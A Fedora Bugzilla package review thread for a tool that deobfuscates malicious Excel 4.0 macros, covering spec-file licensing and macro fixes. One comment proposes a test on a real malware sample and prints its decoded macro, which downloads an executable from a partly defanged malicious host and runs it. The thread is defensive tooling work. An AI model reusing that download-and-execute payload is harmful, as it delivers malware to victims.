https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Bug ID: 2245786 Summary: Review Request: python-xlmmacrodeobfuscator - XLM Emulation engine to deobfuscate malicious XLM macros, also known as Excel 4 Product: Fedora Version: rawhide Status: NEW Component: Package Review Assignee: nobody@fedoraproject.org Reporter: rebus@seznam.cz QA Contact: extras-qa@fedoraproject.org CC: package-review@lists.fedoraproject.org Target Milestone: --- Classification: Fedora
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src....
Description: XLMMacroDeobfuscator XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully performing the code.It supports both xls, xlsm, and xlsb formats. It uses [xlrd2]( [pyxlsb2]( and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.
Fedora Account System Username: rebus
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #1 from Michal Ambroz rebus@seznam.cz --- This package built on koji: https://koji.fedoraproject.org/koji/taskinfo?taskID=108021352
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Aaron Rainbolt arraybolt3@gmail.com changed:
What |Removed |Added ---------------------------------------------------------------------------- Whiteboard| |NotReady Doc Type|--- |If docs needed, set a value CC| |arraybolt3@gmail.com
--- Comment #2 from Aaron Rainbolt arraybolt3@gmail.com --- Unofficial and incomplete initial review of the spec file:
License: Apache License 2.0
This needs to use an SPDX identifier. See https://docs.fedoraproject.org/en-US/legal/license-field/
Also more often than not, a program isn't really under just one license, but oftentimes includes code from other projects under various other licenses. Any files that ultimately end up in the binary RPM in one form or another need to have their licenses listed here.
%{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}
Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines (https://docs.fedoraproject.org/en-US/packaging-guidelines/Python_201x/), and those guidelines are now old and deprecated at this point, so %python_provide is like **really** deprecated now. See https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_provides_... for how to use %py_provides.
BuildRequires: python%{python3_pkgversion}-devel
I think you need to spell out "python3-devel" here rather than using the macro. "Every package that uses Python (at runtime and/or build time) and/or installs Python modules MUST explicitly include BuildRequires: python3-devel in its .spec file, even if Python is not actually invoked during build time." (From https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_distro_wi...)
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Fedora Review Service fedora-review-bot@fedoraproject.org changed:
What |Removed |Added ---------------------------------------------------------------------------- URL| |https://github.com/DissectM | |alware/XLMMacroDeobfuscator
--- Comment #3 from Fedora Review Service fedora-review-bot@fedoraproject.org --- Copr build: https://copr.fedorainfracloud.org/coprs/build/6563210 (succeeded)
Review template: https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-rev...
Please take a look if any issues were found.
--- This comment was created by the fedora-review-service https://github.com/FrostyX/fedora-review-service
If you want to trigger a new Copr build, add a comment containing new Spec and SRPM URLs or [fedora-review-service-build] string.
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #4 from Michal Ambroz rebus@seznam.cz ---
License: Apache License 2.0
changed from long to short SPDX identifier
%{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator} BuildRequires: python%{python3_pkgversion}-devel
I think you need to spell out "python3-devel" here rather than using the
I am planning to support the EPEL from RHEL7, on RHEL this macro translates the package name to python36-something instead of just python3-something. I noticed bigger problem ... I was actually missing the camelcasing which was the reason for explicitly adding that.
Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines
Again something for EPEL package ... there is only python_provide on EPEL. Lets make condition for that to be clear.
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src....
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #5 from Fedora Review Service fedora-review-bot@fedoraproject.org --- Copr build: https://copr.fedorainfracloud.org/coprs/build/6567936 (succeeded)
Review template: https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-rev...
Please take a look if any issues were found.
--- This comment was created by the fedora-review-service https://github.com/FrostyX/fedora-review-service
If you want to trigger a new Copr build, add a comment containing new Spec and SRPM URLs or [fedora-review-service-build] string.
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added ---------------------------------------------------------------------------- Depends On| |2246454
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2246454 [Bug 2246454] Review Request: python-pyxlsb2 - Excel 2007+ Binary Workbook (xlsb) parser
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added ---------------------------------------------------------------------------- Depends On| |2246704
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2246704 [Bug 2246704] Review Request: python-xlrd2 - Library to extract data from Microsoft Excel legacy spreadsheet files (xls)
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added ---------------------------------------------------------------------------- Blocks| |1974565
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=1974565 [Bug 1974565] python-oletools-0.60.1 is available
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #6 from Michal Ambroz rebus@seznam.cz --- As this is really specific tool here I proposed test case to test that the tool does what it is supposed to do. (BEWARE!!!) It is using real malware for test, so handle with care. Download of the second stage is not active now, but still I am de-fanging the malicious URL in the example bellow.
Test1 based on Dider Stevens diary https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110
1) download malware sample from Malshare (need to register) https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb412... https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe0...
2) (OPTIONAL) check that it really contains the obfuscated code in the worksheet cells (using the DidierStevensSuite) This step is optional as this particular sample IS obfuscated and was already publicly analyzed $ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx |xmldump.py celltext| grep -e CALL BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0 BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0
3) check that the xlmdeobfuscator really gives the deobfuscated value $ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL CELL:BC1986 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric%5B.%5Dcom/fattura.exe%22,%22C:%5CProgramData%5C...) CELL:BC1987 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)
https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added ---------------------------------------------------------------------------- Depends On| |2250689
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2250689 [Bug 2250689] Review Request: python-untangle - Converts XML to Python objects
https://bugzilla.redhat.com/show_bug.cgi?id=2245786 Bug 2245786 depends on bug 2250689, which changed state.
Bug 2250689 Summary: Review Request: python-untangle - Converts XML to Python objects https://bugzilla.redhat.com/show_bug.cgi?id=2250689
What |Removed |Added ---------------------------------------------------------------------------- Status|ON_QA |CLOSED Resolution|--- |ERRATA
package-review@lists.fedoraproject.org